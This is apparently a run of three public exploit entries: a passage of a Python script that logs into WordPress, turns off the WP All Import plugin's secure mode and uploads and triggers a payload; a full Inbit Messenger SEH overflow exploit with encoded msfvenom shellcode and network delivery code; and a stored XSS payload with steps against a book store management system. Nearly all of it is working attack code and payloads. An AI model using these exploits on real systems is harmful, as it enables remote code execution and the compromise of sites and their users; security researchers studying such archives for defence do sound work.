is_secure_mode_enabled: bool
wpnonce_edit_settings: str
wpnonce_upload_file: str
def __init__(self, http_response: requests.Response):
self.http_response = http_response
self.check_if_secure_mode_is_enabled()
self.retrieve_wpnonce_edit_settings()
self.retrieve_wpnonce_upload_file()
def check_if_secure_mode_is_enabled(self):
# To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked
# <input type="checkbox" value="1" id="secure" name="secure" checked="checked">
regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve plugin settings. Are you an administrator?")
# print_response(self.http_response) # for debugging
exit()
self.is_secure_mode_enabled = "checked" in regex_search.group()
def retrieve_wpnonce_edit_settings(self):
# You can find this wpnonce in the source file by searching for the following input hidden:
# <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9">
# 052e2438f9 would be the wpnonce for editing the settings
regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?")
# print_response(self.http_response) # for debugging
exit()
self.wpnonce_edit_settings = regex_search.group(1)
def retrieve_wpnonce_upload_file(self):
# You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b';
# dee75fdb8b would be the wpnonce for the upload
regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable")
# print_response(self.http_response) # for debugging
exit()
self.wpnonce_upload_file = regex_search.group(1)
def wp_login():
global session
data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 }
login_cookie = { "wordpress_test_cookie" : "WP Cookie check" }
# allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found.
# Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not
print("Trying to login...")
response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate)
if response.status_code == 302:
print("Logged in successfully!")
return
# print_response(response) # for debugging
print("Login failed. If the credentials are correct, try to print the response to investigate further.")
exit()
def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response:
global session
if set_to_enabled:
print("Enabling secure mode...")
else:
print("Disabling secure mode...")
print("Edit settings wpnonce value: " + wpnonce)
data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 }
response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate)
if response.status_code == 403:
print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?")
# print_response(response) # for debugging
exit()
return response
def switch_back_to_secure_mode():
global session
print("Re-enabling secure mode...")
response = session.get(url=wp_all_import_page_settings)
plugin_setting = PluginSetting(response)
if plugin_setting.is_secure_mode_enabled:
print("Secure mode is already enabled")
return
response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings)
new_plugin_setting = PluginSetting(response)
if not new_plugin_setting.is_secure_mode_enabled:
print("Something went wrong: secure mode has not been re-enabled")
# print_response(response) # for debugging
exit()
print("Secure mode has been re-enabled!")
def get_wpnonce_upload_file() -> str:
global session, re_enable_secure_mode
# If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload
# If Secure Mode is already disabled, it just returns the wpnonce for the upload
print("Checking if secure mode is enabled...")
response = session.get(url=wp_all_import_page_settings)
plugin_setting = PluginSetting(response)
if not plugin_setting.is_secure_mode_enabled:
re_enable_secure_mode = False
print("Insecure mode is already enabled!")
return plugin_setting.wpnonce_upload_file
print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.")
response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings)
new_plugin_setting = PluginSetting(response)
if new_plugin_setting.is_secure_mode_enabled:
print("Something went wrong: secure mode has not been disabled")
# print_response(response) # for debugging
exit()
print("Secure mode has been disabled!")
re_enable_secure_mode = True
return new_plugin_setting.wpnonce_upload_file
def upload_file(wpnonce_upload_file: str):
global session
print("Uploading file...")
print("Upload wpnonce value: " + wpnonce_upload_file)
zip_file_name = os.path.basename(zip_file_to_upload)
upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file
files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))}
data = { "name" : zip_file_name }
response = session.post(url=upload_url, files=files, data=data)
if response.status_code == 200:
print("Server replied with HTTP 200 OK. The upload should be completed.")
print("Payload should be here: " + payload_url)
print("If you can't find the payload at this URL, try to print the response to investigate further")
# print_response(response) # for debugging
return 1
else:
print("Something went wrong during the upload. Try to print the response to investigate further")
# print_response(response) # for debugging
return 0
def activate_payload():
global session
print("Activating payload...")
response = session.get(url=payload_url)
if response.status_code != 200:
print("Something went wrong: could not find payload at " + payload_url)
# print_response(response) # for debugging
return
def print_response(response:requests.Response):
print(response.status_code)
print(response.text)
# Entry Point
def Main():
print("Target: " + target_url)
print("Credentials: " + admin_user + ":" + admin_pass)
# Do the login
wp_login()
# Retrieve wpnonce for upload.
# It disables Secure Mode if needed, then returns the wpnonce
wpnonce_upload_file = get_wpnonce_upload_file()
# Upload the file
file_uploaded = upload_file(wpnonce_upload_file)
# Re-enable Secure Mode if needed
if re_enable_secure_mode:
switch_back_to_secure_mode()
# Activate the payload
if file_uploaded:
activate_payload()
Main()
# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow
# Date: 11/08/2022
# Exploit Author: a-rey
# Vendor Homepage: http://www.inbit.com/support.html
# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html
# Version: v4.6.0 - v4.9.0
# Tested on: Windows XP SP3, Windows 7, Windows 10
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, socket, struct, argparse, logging
"""
/opt/metasploit-framework/bin/msfvenom \
-p windows/messagebox \
ICON=WARNING \
TEXT="get wrecked" \
TITLE="LOLZ" \
EXITFUNC=thread \
-f py \
-v SHELLCODE \
-e x86/shikata_ga_nai \
-b '\x3E'
"""
SHELLCODE = b""
SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4"
SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14"
SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1"
SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd"
SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07"
SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29"
SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde"
SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e"
SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc"
SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43"
SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0"
SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee"
SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20"
SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50"
SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19"
SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77"
SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f"
SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd"
SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f"
SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86"
SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93"
SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40"
SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44"
SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e"
SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf"
SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3"
BANNER = """\033[0m\033[1;35m
╔═════════════════════════════════════════════════════════════════════╗
║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║
╚═════════════════════════════════════════════════════════════════════╝\033[0m
by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗
\033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║
\033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝
\033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝
\033[1;36m██║ ██║ ██║ ██║███████╗ ██║
\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝
\033[0m"""
BAD_BYTES = b"\x3e" # >
PAYLOAD_LENGTH = 2000
nSEH = b"\xEB\x06\x90\x90" # JMP SHORT 0x8; NOP; NOP
SEH = struct.pack("<I", 0x263ae1bd) # ipworks6.dll | POP EBP; POP EBX; RET
# NOTE: sets the TEB's ACTIVATION_CONTEXT_STACK.ActiveFrame = NULL
NULL_ACT_CTX_STUB = b"\x31\xC0\xBB\x00\x10"
NULL_ACT_CTX_STUB += b"\x00\x00\x64\x8B\x48"
NULL_ACT_CTX_STUB += b"\x18\x39\x99\xA8\x01"
NULL_ACT_CTX_STUB += b"\x00\x00\x7C\x0A\x8B"
NULL_ACT_CTX_STUB += b"\x99\xA8\x01\x00\x00"
NULL_ACT_CTX_STUB += b"\x89\x03\xEB\x06\x89"
NULL_ACT_CTX_STUB += b"\x81\xB0\x01\x00\x00"
def exploit(targetIp:str, targetPort:int) -> None:
pkt = b"<"
pkt += (b"A" * 40)
pkt += nSEH
pkt += SEH
pkt += NULL_ACT_CTX_STUB
pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder
pkt += SHELLCODE
# NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack
pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt)))
# NOTE: check for bad bytes
for c in pkt:
if c in BAD_BYTES:
logging.error(f"found bad byte 0x{c:02x} in payload")
sys.exit(-1)
logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((targetIp, targetPort))
s.send(pkt)
s.close()
logging.success("DONE")
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
parser.add_argument('-t', '--target', help='target IP', type=str, required=True)
parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883)
args = parser.parse_args()
# define logger
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')
logging.SUCCESS = logging.CRITICAL + 1
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
# print banner
print(BANNER)
# run exploit
exploit(args.target, args.port)
# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-11-08
# Exploit Author: Rajeshwar Singh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip
# Tested on: Windows/XAMPP
###########################################################################
Payload use = "><script>alert("XSS")</script>
1. Visit URL http://localhost/bsms_ci/
2. login with admin Credentials
3. navigate to user Management
4. Click on "Add New System User"
5. Add payload in "Name" input field
6. Click save.
7. Visit http://localhost/bsms_ci/index.php/user
8. XSS payload execute.